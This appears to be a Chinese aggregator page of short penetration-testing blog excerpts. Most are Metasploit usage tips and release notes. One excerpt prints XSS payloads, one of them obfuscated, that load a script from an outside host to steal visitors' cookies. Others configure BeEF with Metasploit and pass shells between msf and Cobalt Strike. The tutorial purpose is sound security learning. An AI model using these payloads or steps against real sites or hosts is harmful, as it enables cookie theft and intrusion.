metasploit

Metasploit设置LHOST参数技巧

房东的猫 提交于 2020-03-24 18:52:58
3 月,跳不动了?>>> Metasploit设置LHOST参数技巧 当用户使用Metasploit框架中的模块时,经常需要配置LHOST参数。其中,LHOST参数用来指定本地主机IP地址。由于IP地址不容易记忆,而且输入也不方便。此时,用户可以使用接口名来代替,如set LHOST eth0。当用户指定接口名后,将自动使用eth0接口的IP地址。 来源: oschina 链接: https://my.oschina.net/u/1585857/blog/3210323

Metasploit search命令使用技巧

主宰稳场 提交于 2020-03-23 16:16:52
3 月,跳不动了?>>> Metasploit search命令使用技巧 Metasploit提供了大量的模块。当用户希望快速找到针对某漏洞模块时,则可以使用search命令进行搜索。搜索模块时,用户可以指定搜索类型、CVE ID、发布时间等,如search cve:2009 type:exploit。为了方便用户搜索模块,可以使用help search命令查看所有支持的过滤器。 来源: oschina 链接: https://my.oschina.net/u/1585857/blog/3209086

Metasploit advanced命令使用技巧

Deadly 提交于 2020-03-22 16:48:04
3 月,跳不动了?>>> Metasploit advanced命令使用技巧 在Metasploit中,在配置模块时,通常使用show options命令查看模块选项。但是,该命令仅输出的是一些基本选项。用户可以使用advanced命令查看高级模块选项。 来源: oschina 链接: https://my.oschina.net/u/1585857/blog/3208286

Metasploit命令info使用技巧

亡梦爱人 提交于 2020-03-21 15:48:28
3 月,跳不动了?>>> Metasploit命令info使用技巧 在Metasploit中,使用info命令即可查看模块详细信息。使用命令info -d,可以通过浏览器查看模块的描述信息。注意,root用户无法使用该方式进行查看。否则,将显示如下错误提示: Running as root without --no-sandbox is not supported. See https://crbug.com/638180. 来源: oschina 链接: https://my.oschina.net/u/1585857/blog/3207767

Metasploit新增技巧提示功能

狂风中的少年 提交于 2020-03-17 17:50:10
某厂面试归来,发现自己落伍了!>>> Metasploit新增技巧提示功能 在Metasploit 5.0.80版本中,启动msfconsole终端后,将显示有用的命令使用技巧。这些技巧可以帮助用户发现Metasploit的更多新功能。如果想要查看更多的技巧命令,可以执行tip -l命令。如果想要查看tip的帮助信息,可以使用tip -h命令查看。 来源: oschina 链接: https://my.oschina.net/u/1585857/blog/3196764

xss之渗透测试

一世执手 提交于 2020-03-14 23:10:52
跨站脚本攻击:cross site script execution(通常简写为xss,因css与层叠样式表同名,故改为xss),是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式,很多人对于xss的利用大多停留在弹框框的程度,一些厂商对xss也是不以为然,都认为安全级别很低,甚至忽略不计,本文旨在讲述关于跨站脚本攻击的利用方式,并结合实例进行分析。 我们构造的获取cookie的xss脚本代码,已经成功的提交到了网站后台。 代码: </textarea>'"><script src=http://x.imlonghao.com/3E3nja?1371821300></script> 或者 </textarea>'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fx.imlonghao.com%2F3E3nja%3F%22%2BMath.random%28%29%3B%28document.getElementsByTagName

beef+metasploit配置方法

喜夏-厌秋 提交于 2020-02-29 04:34:10
网上的教程很多了,但是自己配置的时候还是会遇到各种各样的问题,这篇主要是为了自己以后再次配置查阅。 一、修改beef配置文件 config.yaml(目录: /usr/share/beef-xss) ,将metasploit下的enable由false改成true。 二 、修改beef扩展模块中的 metasploit的配置文件,目录在 /usr/share/beef-xss/extensions/metasploit, 修改host和callback_host为本机IP(最好不用127.0.0.1代替),pass为连接metasploit时的密码,默认abc123。确保msf_path下kali路径存在metasploit。 三、首次启动msf,要先启 动 postgresql 数据库服务 service postgresql start 四、启 动 msf 可以通过gui启动,kali中的metasploit framework图标,如下图所示: 也可以通过命令启动:./msfconsole 五、启动之后,要加载 msgrpc 命令: load msgrpc ServerHost=192.168.56.101 Pass=abc123 六、启动beef 可通过gui方式启动,也可通过命令行启动,不知道为什么,通过gui方式有时会启动失败

Metasploit发布了版本5.0.76

此生再无相见时 提交于 2020-02-26 06:25:08
Metasploit发布了版本5.0.76 在该版本中,增加了以下模块: (1)增强了set payload命令的输入。用户在指定payload时,在payload名称前可以使用/payload、payload/和/前缀。 (2)post/windows/manage/sshkey_persistence和post/ linux/manage/sshkey_persistence模块:利用SSH Key实施渗透。 (3)post/multi/recon/local_exploit_suggester模块:提升Diamorphine Rootkit信号权限。 (4)module exploit/ linux/smtp/apache_james_exec模块:利用Apache James 2.3.2漏洞创建文件。 更新了以下模块: (1)post/windows/gather/enum_patches 模块:收集所有Windows补丁。 (2)更新了generate命令:避免分段显示攻击载荷信息。 (3)post/ linux/gather/enum_system模块:通过从/sys/devices/system/ cpu/ vulnerabilities目录收集的信息,来检查CPU漏洞。 (4)更新了msfconsole和msfvenom的Zsh completions。 来源:

metasploit与Cobaltstrike互相派生shell

我们两清 提交于 2020-02-23 11:22:08
https://www.cnblogs.com/test404/p/10599981.html msf 派生 shell 给 Cobalt strike(前提有一个meterpreter) msf exploit(handler) > use exploit/windows/local/payload_inject   msf exploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http   msf exploit(payload_inject) > set DisablePayloadHandler true   msf exploit(payload_inject) > set LHOST 192.168.229.143   msf exploit(payload_inject) > set LPORT 1212   msf exploit(payload_inject) > set SESSION 1   msf exploit(payload_inject) > exploit Cobalt strike 派生 shell 给 MSF(前提有个beaconshell) msf > use exploit/multi/handler msf exploit(handler) > set